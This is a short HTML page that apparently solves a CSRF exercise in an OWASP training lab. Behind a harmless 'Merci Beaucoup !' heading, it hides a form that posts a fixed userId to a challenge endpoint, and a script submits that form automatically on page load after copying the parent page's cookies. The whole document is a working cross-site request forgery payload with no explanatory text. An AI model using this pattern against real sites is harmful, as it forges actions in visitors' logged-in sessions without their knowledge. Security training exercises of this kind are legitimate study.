<html>
    <head>
      <title>Home</title>
    </head>
    <body>
        <h1>Merci Beaucoup !</h1>
        <form name="myform" action="https://owasp02.isc.heia-fr.ch/user/csrfchallengetwo/plusplus" method="post">
        <input hidden type="text" name="userId" value="857035251248d051db91c8d269a3d931a5859ce2"><br>
        </form>
        <script type="text/javascript">
            document.cookie = window.parent.document.cookie;
            document.myform.submit();
        </script>
    </body>
</html>
